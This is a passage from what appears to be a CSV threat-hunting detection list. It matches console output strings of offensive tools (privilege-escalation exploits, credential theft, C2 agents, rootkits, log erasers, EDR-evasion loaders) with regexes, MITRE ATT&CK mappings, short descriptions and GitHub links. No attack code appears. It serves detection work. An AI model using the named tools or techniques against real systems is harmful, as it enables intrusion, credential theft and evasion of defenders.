Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] PE Loader mode is selected!*",".{0,1000}\[\+\]\sPE\sLoader\smode\sis\sselected!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*[+] PInject Loaded *",".{0,1000}\[\+\]\sPInject\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Pipe listing:*",".{0,1000}\[\+\]\sPipe\slisting\:.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the 
named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*[+] Poc By @404death *",".{0,1000}\[\+\]\sPoc\sBy\s\@404death\s.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*[+] PocScan *",".{0,1000}\[\+\]\sPocScan\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*[+] Polymorphic encryption*",".{0,1000}\[\+\]\sPolymorphic\sencryption.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*[+] Potenatially Hijackable DLL: *",".{0,1000}\[\+\]\sPotenatially\sHijackable\sDLL\:\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*[+] PowershellKerberos Loaded*",".{0,1000}\[\+\]\sPowershellKerberos\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] PowerView Loaded*",".{0,1000}\[\+\]\sPowerView\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] PPID Spoofing has been disabled*",".{0,1000}\[\+\]\sPPID\sSpoofing\shas\sbeen\sdisabled.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] PPID Spoofing has been disabled*",".{0,1000}\[\+\]\sPPID\sSpoofing\shas\sbeen\sdisabled.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] printing b64encoded(zipped(cradle.py)) for scriptless execution on terminal:*",".{0,1000}\[\+\]\sprinting\sb64encoded\(zipped\(cradle\.py\)\)\sfor\sscriptless\sexecution\son\sterminal\:.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[+] Pyramid HTTP Server listening on port *",".{0,1000}\[\+\]\sPyramid\sHTTP\sServer\slistening\son\sport\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[+] Querying DC without Global Catalog: *",".{0,1000}\[\+\]\sQuerying\sDC\swithout\sGlobal\sCatalog\:\s.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible 
network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*[+] Randomizing syscall names*",".{0,1000}\[\+\]\sRandomizing\ssyscall\snames.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*[+] Rasman service is error*",".{0,1000}\[\+\]\sRasman\sservice\sis\serror.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*[+] Rasman service is running!*",".{0,1000}\[\+\]\sRasman\sservice\sis\srunning!.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*[+] RDP Keylog saved to *",".{0,1000}\[\+\]\sRDP\sKeylog\ssaved\sto\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] RDP Keylogger Loaded*",".{0,1000}\[\+\]\sRDP\sKeylogger\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework 
entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] RDP Keylogger started with PID *",".{0,1000}\[\+\]\sRDP\sKeylogger\sstarted\swith\sPID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Ready for Post-Exp :)*",".{0,1000}\[\+\]\sReady\sfor\sPost\-Exp\s\:\).{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*[+] Registry key set. 
DLL will be loaded on reboot*",".{0,1000}\[\+\]\sRegistry\skey\sset\.\sDLL\swill\sbe\sloaded\son\sreboot.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] Relaying seems successfull, check ntlmrelayx output!*",".{0,1000}\[\+\]\sRelaying\sseems\ssuccessfull,\scheck\sntlmrelayx\soutput!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[+] Rubeus Loaded*",".{0,1000}\[\+\]\sRubeus\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Run the spawn method for SYSTEM shell:*",".{0,1000}\[\+\]\sRun\sthe\sspawn\smethod\sfor\sSYSTEM\sshell\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] RUNNING ALL KNOWN 
EXPLOITS*",".{0,1000}\[\+\]\sRUNNING\sALL\sKNOWN\sEXPLOITS.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*[+] running normal privesc*",".{0,1000}\[\+\]\srunning\snormal\sprivesc.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*[+] RX Injection address: *",".{0,1000}\[\+\]\sRX\sInjection\saddress\:\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] S4U2proxy success!*",".{0,1000}\[\+\]\sS4U2proxy\ssuccess!.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] S4U2self success!*",".{0,1000}\[\+\]\sS4U2self\ssuccess!.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Safety checks passed. 
Implanting your DLL*",".{0,1000}\[\+\]\sSafety\schecks\spassed\.\sImplanting\syour\sDLL.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] Save encrypted shellcode to *",".{0,1000}\[\+\]\sSave\sencrypted\sshellcode\sto\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*[+] Scanning computers list on SMB port *",".{0,1000}\[\+\]\sScanning\scomputers\slist\son\sSMB\sport\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*[+] security evtx file handle unlock succ*",".{0,1000}\[\+\]\ssecurity\sevtx\sfile\shandle\sunlock\ssucc.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*[+] Seems like the creds are valid: * :: * on *",".{0,1000}\[\+\]\sSeems\slike\sthe\screds\sare\svalid\:\s.{0,1000}\s\:\:\s.{0,1000}\son\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*[+] SeImpersonatePrivilege enabled*",".{0,1000}\[\+\]\sSeImpersonatePrivilege\senabled.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is a post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*[+] Sending S4U2proxy request to domain controller *",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\sto\sdomain\scontroller\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Sending S4U2proxy request via KDC proxy: *",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\svia\sKDC\sproxy\:\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Sending S4U2proxy request via KDC proxy:*",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\svia\sKDC\sproxy\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Sending S4U2self request to *",".{0,1000}\[\+\]\sSending\sS4U2self\srequest\sto\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Sending S4U2self request via KDC proxy:*",".{0,1000}\[\+\]\sSending\sS4U2self\srequest\svia\sKDC\sproxy\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Server connected to our evil RPC pipe*",".{0,1000}\[\+\]\sServer\sconnected\sto\sour\sevil\sRPC\spipe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Shellcode Injected Successfully*",".{0,1000}\[\+\]\sShellcode\sInjected\sSuccessfully.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*[+] Shoggoth engine is initiated!*",".{0,1000}\[\+\]\sShoggoth\sengine\sis\sinitiated!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity*",".{0,1000}\[\+\]\sSID\sadded\sto\smsDS\-AllowedToActOnBehalfOfOtherIdentity.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*[+] SMB reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sSMB\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM 
reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[+] SMBRemoting and WMIRemoting Loaded*",".{0,1000}\[\+\]\sSMBRemoting\sand\sWMIRemoting\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Spawning root shell*",".{0,1000}\[\+\]\sSpawning\sroot\sshell.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*[+] Spawning SYSTEM shell*",".{0,1000}\[\+\]\sSpawning\sSYSTEM\sshell.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation 
Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*[+] Starting pspy now*",".{0,1000}\[\+\]\sStarting\spspy\snow.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*[+] Stole token from*",".{0,1000}\[\+\]\sStole\stoken\sfrom.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*[+] Success! 
LD_PRELOAD has been added!*",".{0,1000}\[\+\]\sSuccess!\sLD_PRELOAD\shas\sbeen\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] Successful allocated remote memory: lpRemoteLibraryBuffer:[*",".{0,1000}\[\+\]\sSuccessful\sallocated\sremote\smemory\:\slpRemoteLibraryBuffer\:\[.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] Successful change protection: RW -> RX*",".{0,1000}\[\+\]\sSuccessful\schange\sprotection\:\sRW\s\-\>\sRX.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] Successful copied dll buffer*",".{0,1000}\[\+\]\sSuccessful\scopied\sdll\sbuffer.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] Successful injected DLL: 
hThread:*",".{0,1000}\[\+\]\sSuccessful\sinjected\sDLL\:\shThread\:.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] successfully breached the mainframe as real-PID *",".{0,1000}\[\+\]\ssuccessfully\sbreached\sthe\smainframe\sas\sreal\-PID\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*[+] Successfully downloaded GPO from fakedc to *",".{0,1000}\[\+\]\sSuccessfully\sdownloaded\sGPO\sfrom\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Successfully downloaded legitimate GPO from SYSVOL to *",".{0,1000}\[\+\]\sSuccessfully\sdownloaded\slegitimate\sGPO\sfrom\sSYSVOL\sto\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[+] Successfully injected malicious scheduled task*",".{0,1000}\[\+\]\sSuccessfully\sinjected\smalicious\sscheduled\stask.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM 
relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[+] Successfully injected malicious scheduled task*",".{0,1000}\[\+\]\sSuccessfully\sinjected\smalicious\sscheduled\stask.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Successfully retrieved an access token for User:*",".{0,1000}\[\+\]\sSuccessfully\sretrieved\san\saccess\stoken\sfor\sUser\:.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[+] successfully self destructed server*",".{0,1000}\[\+\]\ssuccessfully\sself\sdestructed\sserver.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*[+] Successfully spoofed GPC 